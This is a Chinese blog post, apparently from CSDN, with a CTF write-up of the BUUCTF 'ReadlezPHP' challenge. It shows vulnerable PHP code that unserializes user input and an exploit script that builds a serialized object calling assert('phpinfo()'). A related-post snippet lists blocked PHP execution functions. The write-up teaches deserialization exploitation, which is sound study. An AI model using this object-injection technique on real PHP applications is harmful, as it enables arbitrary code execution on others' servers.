BUUCTF WEB readlezphp1

最新推荐文章于 2024-08-07 20:16:15 发布
最新推荐文章于 2024-08-07 20:16:15 发布
阅读量520 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/122250259
版权
这篇博客探讨了一个PHP源码审计的例子,通过分析一个包含奇怪a标签的time.php文件,展示了如何利用assert函数来执行phpinfo()。博主提供了利用脚本,并提醒eval被禁用,但assert可以作为替代。同时,提到了flag不在单独文件中,而是在phpinfo中。博客还附带了一个参考视频链接,帮助读者更深入理解这个过程。
摘要由CSDN通过智能技术生成

打开场景,一个窟窿头,太哈人了,源码审计吧
发现一个奇怪的a标签,time.php?source
访问一下,果然是源码审计

 <?php


#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);



2021-12-31 01:36:04

利用点很好找,echo $b($a);
函数功能,$b,参数$a
flag不是一个单独文件,在phpinfo里,吐了,eval也被禁用了,assert可以
写个小脚本

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

print_r(urlencode(serialize($c)))
?>

参考视频链接:https://www.bilibili.com/video/BV113411Y7Nk?spm_id_from=333.999.0.0

显哥无敌
关注
专栏目录
BUUCTF——Web
2201_75331136的博客
07-11 1073
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF WEB PYWebsite1
qq_41696858的博客
12-28 494
这题没啥好说的,经典买flag,在页面源码里找到了个这 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829d
BUUCTF Web [MRCTF2020]PYWebsite1 & [NPUCTF2020]ReadlezPHP1
网安小趴菜
11-17 619
BUUCTF Web [MRCTF2020]PYWebsite1 & [NPUCTF2020]ReadlezPHP1 wp
buuctf-web-[NPUCTF2020]ReadlezPHP
weixin_46079186的博客
07-20 290
打开题目,想查看源码发现不能右键肯定有东西,f12 查看 找到一个链接 打开拿到源代码,看样子是个反序列化 关键代码 调用_destruct函数执行echo \$b(\$a),利用这个函数执行任意我们想执行的函数 $a = $this->a; $b = $this->b; echo $b($a); 构造参数 <?php class HelloPhp { public $a; public $b; } $c = new HelloPhp; $c->b .
[NPUCTF2020]ReadlezPHP1
最新发布
kw741951的博客
08-07 232
此处未想到flag在phpinfo文件中,在网上才发现flag在phpinfo文件,因此构造序列化信息:O:8:"HelloPhp":2:{s:1:"a";ctrl+u查看源代码。看到php代码,打开。
buuctf-ReadlezPHP(反序列化)
m0_62094846的博客
05-22 404
点开后是源代码,要把前面的view-source:删了 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ ...
[NPUCTF2020]ReadlezPHP 1
weixin_53150482的博客
07-20 393
[NPUCTF2020]ReadlezPHP 1
buuctf ReadlezPHP
09-16
buuctf ReadlezPHP是一个CTF题目,根据给出的引用内容,可以看出这是一个PHP代码注入的题目。代码中使用了反序列化函数`unserialize()`来执行一些PHP代码。通过输入不同的反序列化数据可以执行不同的函数。其中可用...
BUUCTF WEB admin1
qq_41696858的博客
09-03 883
这题考的是flask框架的session机制 和我以前观念里不太一样的一点是flask这个框架,session是完全存在本地的,只不过存在着一种加密算法,把它加密了存在了本地,也就是说我们只要有了加密密钥,那session里的值是完全可以被我们修改的 打开场景,查看源码,/login,/register是提示you are not admin 那么就是要以admin权限登录了,几个页面翻了几遍也没找到sql注入啥的漏洞,那只能考虑越权了 先注册一个普通用户,test,1234,登录,查看页面源码,发现a链接
BUUCTF web(九)
m0_46616663的博客
08-29 1229
BUUCTF刷题笔记
BUUCTF-phpweb_第二届网鼎杯朱雀组web
Fisher
05-28 834
拿到题目 先抓个包! 看到两个参数func 和p 很明显联想到function 尝试用读取文件函数读源码 直接用**readfile** 或者 **file_get_contents**可以 读取到源码 接下来就是代码审计 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_termin
[NPUCTF2020]ReadlezPHP
SopRomeo的博客
05-10 1830
进去扫描目录,啥都没有,查看源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this
[NPUCTF2020]ReadlezPHP(反序列化)
EC_Carrot的博客
12-21 286
题目 源代码发现跳转time.php?souce=,进去后显示源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destr
ctf中web题型找到php后怎么做,CTF之web总结
weixin_39521009的博客
04-01 2792
身为一只web小白,但也刷了不少CTF方面的web题,趁着今天有时间,坐下来总结一下关于web的解题方法。0x01 直接查看源代码解题方法:点击右键,查看页面源代码将hidden改为text,value=0改为value=1,点击Enter。出现下图:这段代码的意思就是,将我们传给PIN的值给a,如果a=-1982774773616112831283716166172777371616672727...
ctf web基本步骤
热门推荐
小小白的博客
06-27 3万+
大家做ctf简单点的都可以用这些判断,基本上都会有,除非个别变态的。 1. 看源码 可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2. 抓包 这几天接触到的抓包一般是用burpsuite,如果要多次尝试可以右键->【send t...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值